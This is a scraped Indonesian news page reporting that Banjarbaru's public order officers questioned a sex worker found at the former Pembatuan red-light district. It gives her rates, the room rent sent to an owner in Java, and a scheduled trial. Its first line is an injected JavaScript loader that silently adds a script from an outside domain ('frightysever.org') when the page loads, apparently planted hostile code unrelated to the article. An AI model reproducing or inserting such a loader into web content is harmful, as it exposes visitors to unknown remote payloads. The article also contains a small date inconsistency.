(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Bertarif Rp100 Ribu, PSK Pembatuan Harus Bayar Kamar Rp10 Ribu


KANALKALIMANTAN.COM, BANJARBARU – Soerang perempuan Pekerja Seks Komersial (PSK) yang kedapatan di eks lokalisasi Pembatuan Kecamatan Landasan Ulin, Kota Banjarbaru menjalani pemeriksaan, Senin (25/3/2024) siang.

Perempuan yang sebelumnya diinapkan di rumah singgah Dinas Sosial (Dinsos) Banjarbaru itu kembali digiring ke Mako Satpol PP Banjarbaru untuk melakukan pemeriksaan sebelum dijatuhi hukuman.

“PSK yang pada Jumat (22/3/2023) malam kita tertibkan, lalu kita titipkan di rumah singgah selama satu malam kemudian dijemput oleh pihak keluarganya, dan hari ini kita panggil untuk proses berita acara permeriksaan,” ujar Kasi Opsdal Satpol PP Banjarbaru, Yanto Hidayat, kepada Kanalkalimantan.com, Senin (25/3/2024) siang.

Baca juga: Peternak Babi Diminta Angkat Kaki, Mama Yeol Minta Pemko Berikan Solusi

Tak hanya sekadar bermalam, dijelaskannya bahwa perempuan itu mengakui bahwa dirinya adalah seorang PSK yang memberikan tarif Rp100 ribu setiap kencan.

Lewat introgasi awal juga, perempuan itu mengaku telah menyewa rumah atau kamar di eks lokalisasi tersebut dengan harga Rp10 ribu per sekali kencan.

“Kami kira menyewa rumah atau kamar di eks lokalisasi tersebut dilakukan perbulan, ternyata per kencan,” jelasnya.

Baca juga: Polda Kalsel Buka Rekrutmen Anggota Polri 2024

Dari hasil pengembangan petugas, didapati fakta bahwa uang sewaan rumah atau kamar tersebut ditransfer setiap pembayarannya kepada pengelola kamar yang berada di Pulau Jawa.

“Uang sewaan tersebut ditransfer kepada pemilik rumah atau kamar yang ada di Jawa, begitu lah pengembangan yang kita dapat,” ungkap dia.

Dijelaskannya juga, perempuan itu sudah hampir 10 tahun tinggal di eks lokalisasi tersebut, yang mana dalam beberapa bulan terakhir perempuan tersebut selalu siap melayani tamu yang datang.

Baca juga: Nota Perjanjian Hibah Daerah Dana Pengamanan Pilkada 2024 Ditandatangani

Apesnya pada saat malam Ramadan, dia kedapatan petugas Satpol PP yang tengah berpatroli melakukan pemantauan dan pengawasan di eks lokalisasi Pembatuan tersebut.

PSK itu, sambung Yanto, akan mempertanggungjawabkan perbuatannya di depan meja hijau atas pelanggaran Perda yang dilakukan.

“Insyaallah akan disidangkan hari Rabu tanggal 27 Maret 2024,” sebutnya.

Baca juga: Ini Tips Berpuasa Sehat dan Tetap Semangat dari Kadinkes Banjarbaru

Sementara itu dalam pemeriksaan berita acara, PSK digiring ke Mako Satpol PP Banjarbaru beserta barang bukti seperti bantal, guling, selimut, hingga tisu sisa pakai.

Perempuan tersebut didapati kooperatif dalam hal pengamanan dan pemeriksaan. Dia pun menandatangi surat jaminan untuk tidak kabur hingga persidangan dimulai

“Kooperatif tidak berbelit, kita berikan surat jaminan juga untuk tidak ingkar janji dan kembali lagi hari Rabu. Kalau tidak kembali tentu akan kita kejar supaya tetap mempertanggungjawabkan perbuatannya,” tegas Yanto. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Banmus DPRD Kapuas Susun Kegiatan Masa Persidangan Kedua

KANALKALIMANTAN.COM, KUALA KAPUAS - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas menggelar rapat Badan Musyawarah… Read More

7 jam ago

Festival Hasil Panen Belajar Program Guru Penggerak di HSU

KANALKALIMANTAN.COM, AMUNTAI - Puluhan hasil karya ditampilkan dalam Festival Hasil Panen Belajar Lokakarya 7 Program… Read More

7 jam ago

Bawaslu Kalsel Buka Seleksi Panwascam, Pengawas Lama Tak Penuhi Syarat Diganti

KANALKALIMANTAN.COM, BANJARMASIN - Badan Pengawas Pemilihan Umum (Bawaslu) Provinsi Kalimantan Selatan membuka rekrutmen pengawas ad… Read More

7 jam ago

Sekretariat DPRD Kapuas Ikut Meriahkan Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Pawai budaya rangkaian memeriahkan Hari Jadi ke-218 Kota Kuala Kapuas dan… Read More

8 jam ago

Opsi Lain Maju Pilkada Banjarbaru, Minimal Kantongi 19.061 KTP Dukungan

KANALKALIMANTAN.COM, BANJARBARU -Komisi Pemilihan Umum (KPU) Kota Banjarbaru akan memulai tahapan penyelenggaraan Pilkada dengan membuka pemenuhan… Read More

8 jam ago

Peringati Hari Kartini, Ini Pesan Pj Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan menghadiri peringatan Hari… Read More

10 jam ago

This website uses cookies.